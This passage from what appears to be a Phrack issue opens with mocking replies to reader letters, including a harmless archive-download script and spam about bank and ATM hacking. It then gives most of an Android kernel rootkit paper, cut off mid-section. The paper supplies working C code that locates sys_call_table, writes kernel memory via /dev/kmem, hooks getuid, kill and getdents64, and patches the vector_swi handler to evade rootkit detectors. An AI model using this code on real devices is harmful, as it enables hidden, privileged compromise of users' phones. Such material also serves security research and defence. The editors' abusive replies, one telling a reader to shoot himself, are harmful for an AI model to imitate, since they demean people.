Thank you,
Eva

    [ We published the paper in the linenoise.
      Thanks for the submission Eva! Nice pics btw ;> ]

[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|--=[ 0x0D - ROFL ]=-----------------------------------------------------=|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]


From: ***** ***** <****.*****.****@gmail.com>
Subject: script

Man, I was bored taking a break from working on a vpn project at a library
and decided to make a script in bash to download and decompress the phrack
mags. Its newb meat but I guess Im just going to send it in for you guys to
laugh at, rofl.

    [ ROFL indeed. ]

---
Jackie ***** ****** - *"Focus on Solutions not Problems"*

    [ But you create solutions for non existent problems :D ]

Email0: *****.*****.*****@gmail.com
Email1: skraps_rwt@yahoo.com

    [ We added the script below. If someone could help Nikol Eleutheriou to
      decrypt it so that she doesn't complain please... ]

begin-base64 644 getPhrack.sh
IyEvYmluL2Jhc2gKCiNDVVJJU1NVRT0iNjciClVSTD0iaHR0cDovL3d3dy5w
aHJhY2sub3JnL2FyY2hpdmVzL3Rnei8iCkVaSU5FRElSPSIvaG9tZS9za3Jh
cHMvZXppbmVzL3BocmFjay8iCkNVUklTU1VFPWBHRVQgaHR0cDovL3d3dy5w
aHJhY2sub3JnLyB8IGdyZXAgSVNTVUUgfCBjdXQgLWIgNTAtNTFgCiNwaHJh
Y2s2Ny50YXIuZ3oKCmNkICRFWklORURJUgoKZXhpdHN0YXQoKXsKCWlmIFsg
JD8gPT0gIjAiIF07IHRoZW4KCQllY2hvICJFeHRyYWN0aW9uIHN1c2NjZXMi
CgllbHNlCiAgICAgICAgICAgICAgICBlY2hvICJFeHRyYWN0aW9uIGZhaWxl
ZCIKICAgICAgICBmaQp9Cgpmb3IgKCggeD0xOyB4PCRDVVJJU1NVRTsgeCsr
ICkpOyBkbwoJaWYgWyAtZiAke0VaSU5FRElSfXBocmFjayR7eH0udGFyLmd6
IF07IHRoZW4KCWVjaG8gIklzc3VlICR4IGV4aXN0cyIKCQlpZiBbIC1lICR7
RVpJTkVESVJ9JHt4fSBdOyB0aGVuCgkJCWVjaG8gIklzc3VlIHByZXZpb3Vz
bHkgZXh0cmFjdGVkIgoJCWVsc2UKCQkJZWNobyAiRXh0cmFjdGluZyBJc3N1
ZSAkeCIKCQkJdGFyIHp4ZiAke0VaSU5FRElSfXBocmFjayR7eH0udGFyLmd6
CgkJCWV4aXRzdGF0CgkJZmkKCWVsc2UKCgkJZWNobyAiRG93bmxvYWRpbmcg
aXNzdWUgJHggLi4uLiIKCQlHRVQgJHtVUkx9cGhyYWNrJHt4fS50YXIuZ3og
PiAke0VaSU5FRElSfXBocmFjayR7eH0udGFyLmd6CgkJZWNobyAiRG9uZSBk
b3dubG9hZGluZyBpc3N1ZSAkeCAuLi4uIgoJCWVjaG8gIkV4dHJhY3Rpbmcg
aXNzdWUgJHgiCgkJdGFyIHp4dmYgJHtFWklORURJUn1waHJhY2ske3h9LnRh
ci5negoJCWV4aXRzdGF0CglmaQpkb25lICAK
====

                                    ---

From: Tom <thom128@gmail.com>
Subject: Phrack Rules The World!

Hi there,

I like hacking but I never done it.

    [ So how do you know that you like it? ]

Wrote a poem about it.

    [ Was it worth it? ]

I wanna work in IT as systems admin.

    [ Hem... ok? Why? :) ]

Please publish my poem in your magazine.

    [ Done! ]

Phrack Rules!

    [ Sure it does! ]

Heil from London, England.

Razor Tech Warrior

They told you that you were nothing
Just another name and number
They said you were dumb and dumber

But you stole
Their lives away
Network Nazi
Live to fight another day

    [ Network Nazi Live to fight another day <-- WTF ???? ]

Through the black
Of the nights metal sheets
In tower blocks and tenements
Cyber crime it breeds

The government will stomp you out
But burn their kernel
Lock it down
While others are still asleep.

    [ We are speechless. All we can say is: LOL. ]

                                    ---

From: Tom <thom***@gmail.com>
Subject: Some Photos From London

Hi there,

Just thought i would send u some pics of me and my family/friends. i love
the mag am a big fan...keep up the good work.

    [ And he really sent us pics. Your Grandma seems nice btw but you look
      like a virgin geek unfortunately :( ]

                                    ---

From: b-fox <*****@bol.com.br>
Subject: Hey... Mother fucker

    [ Hey. p0rn industry calls it MILF fucking ]

Wait my document... I'm gonna write I paper today about/regarding bomb
development and something abt legislation in general. Huge hug!

    [ Priceless. :') ]

[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|--=[ 0x0E - Shame Shame Shame.......shame on you ]=---------------------=|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]


From: varenya mehta <varenya2007@yahoo.co.in>
Subject: ANTISPAM

Run both ethernet and phone over existing Cat-5 cable

    [ Cool! New submission! \o/ ]

The new fad when building a house is to run Cat-5 cable to every wall jack.
These jacks can then be used for either ethernet or phone. When we got our
new house built, we chose to get four of these jacks, and we intended to
use them for phone service. Unfortunately, the wifi is a bit flaky in
places (even with two access points.) This got annoying up until the point
where three of the four wall jacks were being used for ethernet, leaving
just one for phone. This was a problem.

The solution is to run both ethernet and phone over the same existing cat-5
cable. Every wall jack becomes two jacks, one RJ-11 for phone and one RJ-45
for ethernet. This neat hack could save you a lot of money, as you only
have to buy new wall plates and jacks rather than wall plates, jacks, and
hundreds of feet of wire.

    [ Really cool hack. This one may fit in the linenoise :) ]

[...]

Also note that this procedure will not work with PoE (Power over Ethernet)
devices. Nothing bad will happen, it just won't transmit power. See step 13
for apossibly unsafe way to keep your PoE and add phone service. Also, it
will not work with gigabit ethernet-- gigabit ethernet uses all four pairs.
It will work fine at 10/100 Mbps which is sufficient for most people

    [ Wait! Something is wrong. What is step13 and aren't a few things
      missing? Let's google() a bit...

      @(X_X)@

      http://www.instructables.com/id/Hack-your-House-Run-both-ethernet-
      and-phone-over-/

      So not only did you send us a ripped paper. But you idiot were not
      smart enough to click on "Next step" to copy the whole. LOL. ]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
P.S. -please reply whether my submission will be added or not in this
edition of ur highly esteemed Phrack magazine...loking forward to your
reply :)
cheers

    [ Ur highly esteemed Phrack magazine would recommend to go shoot
      yourself. ]


[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|--=[ 0x0F - Insanity or SPAM??? ]=--------------------------------------=|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]

                                    ---

From: John Smith <devils-advocate-666@live.com>
Subject: Dear staff(at)phrack[DOT]org; I love what you guys do for the
U.S.A! Can you email your e news letters too please? Thank you.

Can you please add me to your e-news letter list, so that I can recieve new
updates from your cite? I totally loved what you guys had written about ai,
and mind hacking and about hacking for the U.S. and Cypher Punks & Ninja
Strike Force! Best of luck to all of you staff members at Phrack! I would
like to know if you guys could please email me back some information in
regards about rsome bank accounts that was on CRYPTOME, or if you guys
could tell me about how you all had cash flow that came from hacked ATM
terminals that you guys had done remotely, because I need to be hacking
systems right now and I had all of my stuff jacked and I was robbed with
all of your softwares that I had for CIA/ NSA and I've been trying to log
onto some banking systems for my  CIA/ NSA digital cash, or could you guys
send me some lock picks, or DIE BOLD keys to open some safes and vaults or
could you send me some Cypher Punks white paiges or other instructions to
interceptor frozen accounts on line and or how to obtain money for starting
a Cypher Punks EBB & FLO system to develope an agriculture business plan
that will help finance money for CIA & NSA op (ie- with IQT and with
Foresight Nanotechnology Institute and with CTBA.org) to counter the HASHID
culture?   Such as GSPC in Morocco and in Algeria, GIA, FIS, ETI, AQIM,
Sahel Pan, DR-CONGO, AQAP, Hezbollah, HAMAS, Hizbullah, IMU, and fighting
against the salafyists in the Magreb's EU-Arabia HASHID zones, and against
the EVIL EMPIRE's MOIS, MEK, MEKO, PKK, VEVAK, ISI, FSB, KGB, NAK, GRU, and
Brazillian Guerillas and Chychenian Rebels and mob and Russian Mob for
GAZPROM Russian Mob Oil Monopoly and countering all of these groups members
and contacts and countering their economic insugernt threats
internationally, by hacking into their networks and locating them with RNM
ai, and blood clotting the Evil Empire, and moving and on the GO like CIA
backing the "Wrath of GOD" and with the Cult of CIA's MKULTRA program, and
I mean redndering synapsial "WET WORK" by taking their ballance with the
"EXIT BLOW," for NSA/ CIA's Ninja Strike Force and I want to be taking our
threats to the Land of Snow and flurries will show me to the rest of their
Evil Empires members locations by terminating them with Illuminati and I'll
be hacking their minds and their bank accounts and stealing all of their
wealth and contacts and other intelligence for RED Team, and taking their
materials as loot, and sending it onto an encrypted site, but I want to
creat my own ai online site with grant.gov grant money asap, and then once
that's done I can go and locate them with RNM ai, but I would like  aving
somean ai quantum consciousness program with a self assembling "FOG" EW ai
HDD quantum computer with an infinite memory that would allow me to hack
bank accounts with an ip installed with nano-bio-technologies with inner
cellular blood vessel programming and cellular mind net morphing
technologies with RNM, nanotechnology made with a neuronal networking and
has a 3-d holographic video and 3-d holographic audio with real world and
mirror world ai 3-d/ 4-d softwares for an online Cypher Punks & Ninja
Strike Force & Cult of Dead Cow members with other CIA/ NSA Intelligence
Analysis Cammander's of Red Teaming (aka- COUNTER-INTELLIGENCE TEAM's ALPHA
& BRAVO:) Black Ops- Red Teaming  forum with an ai 3-d GOOGLE EARTH PRO GPS
softwares with a soft mobi GLOBAL IP softwares package STEALTH NINJA phone
with SIG PRO Telecommunications softwares for NSA & CIA CT:qto let me know
about a should

Tchao with Respect-
Fabian.

	[ What the fuck is that shit??? ]

                                    ---

From: John Smith <devils-advocate-666@live.com>
Subject: ANTISPAM

	[ Hey it's you again! ]

Dear Phrack magazine,
Hello my name is SA John Smith, I'm from No Town, VA. but moved to
Brosnan, Missouri a few years back, and just recently moved to the huge
L.A.; but, I would like to discuss some about covering some articles
about Konkrete Jungle music parties and drum and bass massives done
internationally, to help promote Cypher Punks Ebb & Flo Garden's and
to help promote Covert Operations and Covert Actions for Cypher Punks,
Ninja Strike Force, CIA MK-ULTRA and Red Teaming financing and donation
sources to do shadowing, spike zones, drop deads, and some net working
for some brush offs of information, softwares, and to cache equipment
and personell at Squats (ie- abbandonned buildings, subway stations,
subterrainean tunnels, Ligne Imagineaux types of areas, beach houses,
Four Seasons Resort, casino's, Def Con Seminar, yahts, and other jungle
music parties and be for the U.S. like the Maquis- WWII French Resistance,
OSS, OAS, SIS, CSIS, CIA, Mossad, Shin Bet, NSA, and others from NATO and
U.S. Coalition Forces, and some U.N. Merc's and other types of PMCS's
Mercenaries for hire;) But, also covering atm hacking, to recieve cash
and Flow in Game Theory like doing Parkour tricks in Mirror's Edge for
Intelligence Analysis Red Team Well, I gotta go now, best wishes to you
all, and I'll contact you again, or better yet, just contact me with ai,
and we can meet up.

Tchao-
The Devils Advocate.

	[ Spamming or brainfucked? ]

|--=[ EOF ]=-------------------------------------------------------------=|


--------------------------------------------------------------------------------


                              ==Phrack Inc.==

                Volume 0x0e, Issue 0x44, Phile #0x06 of 0x13

|=-----------------------------------------------------------------------=|
|=-----------=[ Android platform based linux kernel rootkit ]=-----------=|
|=-----------------------------------------------------------------------=|
|=-----------------=[ dong-hoon you <x82@inetcop.org> ]=-----------------=|
|=------------------------=[ April 04th 2011 ]=--------------------------=|
|=-----------------------------------------------------------------------=|

--[ Contents

  1 - Introduction

  2 - Basic techniques for hooking
    2.1 - Searching sys_call_table
    2.2 - Identifying sys_call_table size
    2.3 - Getting over the problem of structure size in kernel versions
    2.4 - Treating version magic

  3 - sys_call_table hooking through /dev/kmem access technique

  4 - modifying sys_call_table handle code in vector_swi handler routine

  5 - exception vector table modifying hooking techniques
    5.1 - exception vector table
    5.2 - Hooking techniques changing vector_swi handler
    5.3 - Hooking techniques changing branch instruction offset

  6 - Conclusion

  7 - References

  8 - Appendix: earthworm.tgz.uu


--[ 1 - Introduction

This paper covers rootkit techniques that can be used in linux kernel based
on Android platform using ARM(Advanced RISC Machine) process. All the tests
in this paper were performed in Motoroi XT720 model(2.6.29-omap1 kernel)
and Galaxy S SHW-M110S model(2.6.32.9 kernel). Note that some contents may
not apply to all smart platform machines and there are some bugs you can
modify.

We have seen various linux kernel hooking techniques of some pioneers([1]
[2][3][4][5]). Especially, I appreciate to Silvio Cesare and sd who
introduced and developed the /dev/kmem technique. Read the references for
more information.

In this paper, we are going to discuss a few hooking techniques.

	1. Simple and traditional hooking technique using kmem device.
	2. Traditional hooking technique changing sys_call_table offset in
	   vector_swi handler.
	3. Two newly developed hooking techniques changing interrupt
	   service routine handler in exception vector table.

The main concepts of the techniques mentioned in this paper are 'smart' and
'simple'. This is because this paper focuses on hooking through modifying
the least kernel memory and by the simplest way. As the past good
techniques were, hooking must be possible freely before and after system
call.

This paper consists of eight parts and I tried to supply various examples
for readers' convenience by putting abundant appendices. The example codes
are written for ARM architecture, but if you modify some parts, you can use
them in the environment of ia32 architecture and even in the environment
that doesn't support LKM.


--[ 2 - Basic techniques for hooking

sys_call_table is a table which stores the addresses of low-level system
routines. Most of classical hooking techniques interrupt the sys_call_table
for some purposes. Because of this, some protection techniques such as
hiding symbol and moving to the field of read-only have been adapted to
protect sys_call_table from attackers. These protections, however,
can be easily removed if an attacker uses kmem device access technique.
To discuss other techniques making protection useless is beyond the purpose
of this paper.


--[ 2.1 - Searching sys_call_table

If sys_call_table symbol is not exported and there is no sys_call_table
information in kallsyms file which contains kernel symbol table
information, it will be difficult to get the sys_call_table address that
varies on each version of platform kernel. So, we need to research the way
to get the address of sys_call_table without symbol table information.

You can find the similar techniques in the web[10], but apart from this,
this paper is written to meet the Android platform on the way of testing.


--[ 2.1.1 - Getting sys_call_table address in vector_swi handler

At first, I will introduce the first two ways to get sys_call_table address
The code I will introduce here is written dependently in the interrupt
implementation of ARM process.

Generally, in the case of ARM process, when interrupt or exception happens,
it branches to the exception vector table. In that exception vector table,
there are exception hander addresses that match each exception handler
routines. The kernel of present Android platform uses high vector
(0xffff0000) and at the point of 0xffff0008, offset by 0x08, there is a 4
byte instruction to branch to the software interrupt handler. When the
instruction runs, the address of the software interrupt handler stored in
the address 0xffff0420, offset by 0x420, is called. See the section 5.1 for
more information.

void get_sys_call_table(){
	void *swi_addr=(long *)0xffff0008;
	unsigned long offset=0;
	unsigned long *vector_swi_addr=0;
	unsigned long sys_call_table=0;

	offset=((*(long *)swi_addr)&0xfff)+8;
	vector_swi_addr=*(unsigned long *)(swi_addr+offset);

	while(vector_swi_addr++){
		if(((*(unsigned long *)vector_swi_addr)&
		0xfffff000)==0xe28f8000){
			offset=((*(unsigned long *)vector_swi_addr)&
			0xfff)+8;
			sys_call_table=(void *)vector_swi_addr+offset;
			break;
		}
	}
	return;
}

At first, this code gets the address of vector_swi routine(software
interrupt process exception handler) in the exception vector table of high
vector and then, gets the address of a code that handles the
sys_call_table address. The followings are some parts of vector_swi handler
code.

000000c0 <vector_swi>:
    c0: e24dd048 sub     sp, sp, #72     ; 0x48 (S_FRAME_SIZE)
    c4: e88d1fff stmia   sp, {r0 - r12}  ; Calling r0 - r12
    c8: e28d803c add     r8, sp, #60     ; 0x3c (S_PC)
    cc: e9486000 stmdb   r8, {sp, lr}^   ; Calling sp, lr
    d0: e14f8000 mrs     r8, SPSR        ; called from non-FIQ mode, so ok.
    d4: e58de03c str     lr, [sp, #60]   ; Save calling PC
    d8: e58d8040 str     r8, [sp, #64]   ; Save CPSR
    dc: e58d0044 str     r0, [sp, #68]   ; Save OLD_R0
    e0: e3a0b000 mov     fp, #0  ; 0x0   ; zero fp
    e4: e3180020 tst     r8, #32 ; 0x20  ; this is SPSR from save_user_regs
    e8: 12877609 addne   r7, r7, #9437184; put OS number in
    ec: 051e7004 ldreq   r7, [lr, #-4]
    f0: e59fc0a8 ldr     ip, [pc, #168]  ; 1a0 <__cr_alignment>
    f4: e59cc000 ldr     ip, [ip]
    f8: ee01cf10 mcr     15, 0, ip, cr1, cr0, {0} ; update control register
    fc: e321f013 msr     CPSR_c, #19     ; 0x13 enable_irq
   100: e1a096ad mov     r9, sp, lsr #13 ; get_thread_info tsk
   104: e1a09689 mov     r9, r9, lsl #13
[*]108: e28f8094 add     r8, pc, #148    ; load syscall table pointer
   10c: e599c000 ldr     ip, [r9]        ; check for syscall tracing

The asterisk part is the code of sys_call_table. This code notifies the
start of sys_call_table at the appointed offset from the present pc
address. So, we can get the offset value to figure out the position of
sys_call_table if we can find opcode pattern corresponding to "add r8, pc"
instruction.

opcode: 0xe28f8???

if(((*(unsigned long *)vector_swi_addr)&0xfffff000)==0xe28f8000){
	offset=((*(unsigned long *)vector_swi_addr)&0xfff)+8;
	sys_call_table=(void *)vector_swi_addr+offset;
	break;

From this, we can get the address of sys_call_table handled in
vector_swi handler routine. And there is an easier way to do this.


--[ 2.1.2 - Finding sys_call_table addr through sys_close addr searching

The second way to get the address of sys_call_table is simpler than the way
introduced in 2.1.1. This way is to find the address by using the fact that
sys_close address, with open symbol, is in 0x6 offset from the starting
point of sys_call_table.

... the same vector_swi address searching routine parts omitted ...

	while(vector_swi_addr++){
		if(*(unsigned long *)vector_swi_addr==&sys_close){
			sys_call_table=(void *)vector_swi_addr-(6*4);
			break;
		}
	}
}

By using the fact that sys_call_table resides after vector_swi handler
address, we can search the sys_close which is appointed as the sixth system
call of sys_table_call.

fs/open.c:
EXPORT_SYMBOL(sys_close);
...

call.S:
/* 0 */		CALL(sys_restart_syscall)
		CALL(sys_exit)
		CALL(sys_fork_wrapper)
		CALL(sys_read)
		CALL(sys_write)
/* 5 */		CALL(sys_open)
		CALL(sys_close)

This searching way has a technical disadvantage that we must get the
sys_close kernel symbol address beforehand if it's implemented in user
mode.


--[ 2.2 - Identifying sys_call_table size

The hooking technique which will be introduced in section 4 changes the
sys_call_table handle code within vector_swi handler. It generates the copy
of the existing sys_call_table in the heap memory. Because the size of
sys_call_table varies in each platform kernel version, we need a precise
size of sys_call_table to generate a copy.

... the same vector_swi address searching routine parts omitted ...

	while(vector_swi_addr++){
		if(((*(unsigned long *)vector_swi_addr)&
		0xffff0000)==0xe3570000){
			i=0x10-(((*(unsigned long *)vector_swi_addr)&
			0xff00)>>8);
			size=((*(unsigned long *)vector_swi_addr)&
			0xff)<<(2*i);
			break;
		}
	}
}

This code searches code which controls the size of sys_call_table within
vector_swi routine and then gets the value, the size of sys_call_table.
The following code determines the size of sys_call_table, and it makes a
part of a function that calls system call saved in sys_call_table.

   118: e92d0030 stmdb   sp!, {r4, r5}   ; push fifth and sixth args
   11c: e31c0c01 tst     ip, #256        ; are we tracing syscalls?
   120: 1a000008 bne     148 <__sys_trace>
[*]124: e3570f5b cmp     r7, #364        ; check upper syscall limit
   128: e24fee13 sub     lr, pc, #304    ; return address
   12c: 3798f107 ldrcc   pc, [r8, r7, lsl #2] ; call sys_* routine

The asterisk part compares the size of sys_call_table. This code checks if
the r7 register value which contains system call number is bigger than
syscall limit. So, if we search opcode pattern(0xe357????) corresponding to
"cmp r7", we can get the exact size of sys_call_table. For your
information, all of the offset values can be obtained by using ARM
architecture operand counting method.


--[ 2.3 - Getting over the problem of structure size in kernel versions

Even if you are using the same version of kernels, the size of structure
varies according to the compile environments and config options. Thus, if
we use a wrong structure with a wrong size, it is not likely to work as we
expect. To prevent errors caused by the difference of structure offset and
to enable our code to work in various kernel environments, we need to build
a function which gets the offset needed from the structure.

void find_offset(void){
	unsigned char *init_task_ptr=(char *)&init_task;
	int offset=0,i;
	char *ptr=0;

	/* getting the position of comm offset
	   within task_struct structure */
	for(i=0;i<0x600;i++){
		if(init_task_ptr[i]=='s'&&init_task_ptr[i+1]=='w'&&
		init_task_ptr[i+2]=='a'&&init_task_ptr[i+3]=='p'&&
		init_task_ptr[i+4]=='p'&&init_task_ptr[i+5]=='e'&&
		init_task_ptr[i+6]=='r'){
			comm_offset=i;
			break;
		}
	}
	/* getting the position of tasks.next offset
	   within task_struct structure */
	init_task_ptr+=0x50;
	for(i=0x50;i<0x300;i+=4,init_task_ptr+=4){
		offset=*(long *)init_task_ptr;
		if(offset&&offset>0xc0000000){
			offset-=i;
			offset+=comm_offset;
			if(strcmp((char *)offset,"init")){
				continue;
			} else {
				next_offset=i;

				/* getting the position of parent offset
				   within task_struct structure */
				for(;i<0x300;i+=4,init_task_ptr+=4){
					offset=*(long *)init_task_ptr;
					if(offset&&offset>0xc0000000){
						offset+=comm_offset;
						if(strcmp
						((char *)offset,"swapper"))
						{
							continue;
						} else {
							parent_offset=i+4;
							break;
						}
					}
				}
				break;
			}
		}
	}
	/* getting the position of cred offset
	   within task_struct structure */
	init_task_ptr=(char *)&init_task;
	init_task_ptr+=comm_offset;
	for(i=0;i<0x50;i+=4,init_task_ptr-=4){
		offset=*(long *)init_task_ptr;
		if(offset&&offset>0xc0000000&&offset<0xd0000000&&
			offset==*(long *)(init_task_ptr-4)){
			ptr=(char *)offset;
			if(*(long *)&ptr[4]==0&&
				*(long *)&ptr[8]==0&&
				*(long *)&ptr[12]==0&&
				*(long *)&ptr[16]==0&&
				*(long *)&ptr[20]==0&&
				*(long *)&ptr[24]==0&&
				*(long *)&ptr[28]==0&&
				*(long *)&ptr[32]==0){
				cred_offset=i;
				break;
			}
		}
	}
	/* getting the position of pid offset
	   within task_struct structure */
	pid_offset=parent_offset-0xc;

	return;
}

This code gets the information of PCB(process control block) using some
features that can be used as patterns of task_struct structure.

First, we need to search init_task for the process name "swapper" to find
out address of "comm" variable within task_struct structure created before
init process. Then, we search for "next" pointer from "tasks" which is a
linked list of process structure. Finally, we use "comm" variable to figure
out whether the process has a name of "init". If it does, we get the offset
address of "next" pointer.

include/linux/sched.h:
struct task_struct {
...
	struct list_head tasks;
...
	pid_t pid;
...
	struct task_struct *real_parent; /* real parent process */
	struct task_struct *parent; /* recipient of SIGCHLD,
					wait4() reports */
...
	const struct cred *real_cred; /* objective and
					real subjective task
					* credentials (COW) */
	const struct cred *cred; /* effective (overridable)
					subjective task */
	struct mutex cred_exec_mutex; /* execve vs ptrace cred
					calculation mutex */

	char comm[TASK_COMM_LEN]; /* executable name ... */

After this, we get the parent pointer by checking some pointers. And if
this is a right parent pointer, it has the name of previous task(init_task)
process, swapper. The reason we search the address of parent pointer is to
get the offset of pid variable by using a parent offset as a base point.

To get the position of cred structure pointer related with task privilege,
we perform backward search from the point of comm variable and check if the
id of each user is 0.


--[ 2.4 - Treating version magic

Check the whitepaper[11] of Christian Papathanasiou and Nicholas J. Percoco
in Defcon 18. The paper introduces the way of treating version magic by
modifying the header of utsrelease.h when we compile LKM rootkit module.
In fact, I have used a tool which overwrites the vermagic value of compiled
kernel module binary directly before they presented.


--[ 3 - sys_call_table hooking through /dev/kmem access technique

I hope you take this section as a warming-up. If you want to know more
detailed background knowledge about /dev/kmem access technique, check the
"Run-time kernel patching" by Silvio and "Linux on-the-fly kernel patching
without LKM" by sd.

At least until now, the root privilege of access to /dev/kmem device within
linux kernel in Android platform is allowed. So, it is possible to move
through lseek() and to read through read(). Newly written /dev/kmem access
routines are as follows.

#define MAP_SIZE 4096UL
#define MAP_MASK (MAP_SIZE - 1)

int kmem;

/* read data from kmem */
void read_kmem(unsigned char *m,unsigned off,int sz)
{
        int i;
        void *buf,*v_addr;

        if((buf=mmap(0,MAP_SIZE*2,PROT_READ|PROT_WRITE,
	MAP_SHARED,kmem,off&~MAP_MASK))==(void *)-1){
                perror("read: mmap error");
                exit(0);
        }
        for(i=0;i<sz;i++){
                v_addr=buf+(off&MAP_MASK)+i;
                m[i]=*((unsigned char *)v_addr);
        }
        if(munmap(buf,MAP_SIZE*2)==-1){
                perror("read: munmap error");
                exit(0);
        }
	return;
}

/* write data to kmem */
void write_kmem(unsigned char *m,unsigned off,int sz)
{
        int i;
        void *buf,*v_addr;

        if((buf=mmap(0,MAP_SIZE*2,PROT_READ|PROT_WRITE,
	MAP_SHARED,kmem,off&~MAP_MASK))==(void *)-1){
                perror("write: mmap error");
                exit(0);
        }
        for(i=0;i<sz;i++){
                v_addr=buf+(off&MAP_MASK)+i;
                *((unsigned char *)v_addr)=m[i];
        }
        if(munmap(buf,MAP_SIZE*2)==-1){
                perror("write: munmap error");
                exit(0);
        }
	return;
}

This code makes the kernel memory address we want shared with user memory
area as much as the size of two pages and then we can read and write the
kernel by reading and writing on the shared memory. Even though the
searched sys_call_table is allocated in read-only area, we can simply
modify the contents of sys_call_table through /dev/kmem access technique.
The example of hooking through sys_call_table modification is as follows.

kmem=open("/dev/kmem",O_RDWR|O_SYNC);
if(kmem<0){
	return 1;
}
...
if(c=='I'||c=='i'){ /* install */
	addr_ptr=(char *)get_kernel_symbol("hacked_getuid");
	write_kmem((char *)&addr_ptr,addr+__NR_GETUID*4,4);
	addr_ptr=(char *)get_kernel_symbol("hacked_writev");
	write_kmem((char *)&addr_ptr,addr+__NR_WRITEV*4,4);
	addr_ptr=(char *)get_kernel_symbol("hacked_kill");
	write_kmem((char *)&addr_ptr,addr+__NR_KILL*4,4);
	addr_ptr=(char *)get_kernel_symbol("hacked_getdents64");
	write_kmem((char *)&addr_ptr,addr+__NR_GETDENTS64*4,4);
} else if(c=='U'||c=='u'){ /* uninstall */
	...
}
close(kmem);

The attack code can be compiled in the mode of LKM module and general ELF32
executable file format.


--[ 4 - modifying sys_call_table handle code in vector_swi handler routine

The techniques introduced in section 3 are easily detected by rootkit
detection tools. So, some pioneers have researched the ways which modify
some parts of exception handler function processing software interrupt.
The technique introduced in this section generates a copy version of
sys_call_table in kernel heap memory without modifying the
sys_call_table directly.

static void *hacked_sys_call_table[500];
static void **sys_call_table;
int sys_call_table_size;
...

int init_module(void){
...
	get_sys_call_table(); // position and size of sys_call_table
	memcpy(hacked_sys_call_table,sys_call_table,sys_call_table_size*4);

After generating this copy version, we have to modify some parts of
sys_call_table processed within vector_swi handler routine. It is because
sys_call_table is handled as a offset, not an address. It is a feature that
separates ARM architecture from ia32 architecture.

code before compile:
ENTRY(vector_swi)
...
	get_thread_info tsk
	adr     tbl, sys_call_table ; load syscall table pointer
	~~~~~~~~~~~~~~~~~~~~~~~~~~~ -> code of sys_call_table
	ldr     ip, [tsk, #TI_FLAGS] ; @ check for syscall tracing

code after compile:
000000c0 <vector_swi>:
...
   100: e1a096ad mov     r9, sp, lsr #13 ; get_thread_info tsk
   104: e1a09689 mov     r9, r9, lsl #13
[*]108: e28f8094 add     r8, pc, #148    ; load syscall table pointer
                 ~~~~~~~~~~~~~~~~~~~~
                 +-> deal sys_call_table as relative offset
   10c: e599c000 ldr     ip, [r9]        ; check for syscall tracing

So, I contrived a hooking technique modifying "add r8, pc, #offset" code
itself like this.

before modifying: e28f80??	add     r8, pc, #??
after  modifying: e59f80??	ldr     r8, [pc, #??]

These instructions get the address of sys_call_table at the specified
offset from the present pc address and then store it in r8 register. As a
result, the address of sys_call_table is stored in r8 register. Now, we
have to make a separated space to store the address of sys_call_table copy
near the processing routine. After some consideration, I decided to
overwrite nop code of other function's epilogue near vector_swi handler.

00000174 <__sys_trace_return>:
   174: e5ad0008 str     r0, [sp, #8]!
   178: e1a02007 mov     r2, r7
   17c: e1a0100d mov     r1, sp
   180: e3a00001 mov     r0, #1  ; 0x1
   184: ebfffffe bl      0 <syscall_trace>
   188: eaffffb1 b       54 <ret_to_user>
[*]18c: e320f000 nop     {0}
        ~~~~~~~~ -> position to overwrite the copy of sys_call_table
   190: e320f000 nop     {0}
        ...

  000001a0 <__cr_alignment>:
   1a0: 00000000                                ....

  000001a4 <sys_call_table>:

Now, if we count the offset from the address of sys_call_table to the
address overwritten with the address of sys_call_table copy and then modify
code, we can use the table we copied whenever system call is called. The
hooking code modifying some parts of vector_swi handling routine and nop
code near the address of sys_call_table is as follows:

void install_hooker(){
	void *swi_addr=(long *)0xffff0008;
	unsigned long offset=0;
	unsigned long *vector_swi_addr=0,*ptr;
	unsigned char buf[MAP_SIZE+1];
	unsigned long modify_addr1=0;
	unsigned long modify_addr2=0;
	unsigned long addr=0;
	char *addr_ptr;

	offset=((*(long *)swi_addr)&0xfff)+8;
	vector_swi_addr=*(unsigned long *)(swi_addr+offset);

	memset((char *)buf,0,sizeof(buf));
	read_kmem(buf,(long)vector_swi_addr,MAP_SIZE);
	ptr=(unsigned long *)buf;

	/* get the address of ldr that handles sys_call_table */
	while(ptr){
		if(((*(unsigned long *)ptr)&0xfffff000)==0xe28f8000){
			modify_addr1=(unsigned long)vector_swi_addr;
			break;
		}
		ptr++;
		vector_swi_addr++;
	}
	/* get the address of nop that will be overwritten */
	while(ptr){
		if(*(unsigned long *)ptr==0xe320f000){
			modify_addr2=(unsigned long)vector_swi_addr;
			break;
		}
		ptr++;
		vector_swi_addr++;
	}

	/* overwrite nop with hacked_sys_call_table */
	addr_ptr=(char *)get_kernel_symbol("hacked_sys_call_table");
	write_kmem((char *)&addr_ptr,modify_addr2,4);

	/* calculate fake table offset */
	offset=modify_addr2-modify_addr1-8;

	/* change sys_call_table offset into fake table offset */
	addr=0xe59f8000+offset; /* ldr r8, [pc, #offset] */
	addr_ptr=(char *)addr;
	write_kmem((char *)&addr_ptr,modify_addr1,4);

	return;
}

This code gets the address of the code that handles sys_call_table within
vector_swi handler routine, and then finds nop code around and stores the
address of hacked_sys_call_table which is a copy version of sys_call_table.
After this, we get the sys_call_table handle code from the offset in which
hacked_sys_call_table resides and then hooking starts.


--[ 5 - exception vector table modifying hooking techniques

This section discusses two hooking techniques, one is the hooking technique
which changes the address of software interrupt exception handler routine
within exception vector table and the other is the technique which changes
the offset of code branching to vector_swi handler. The purpose of these
two techniques is to implement the hooking technique that modifies only
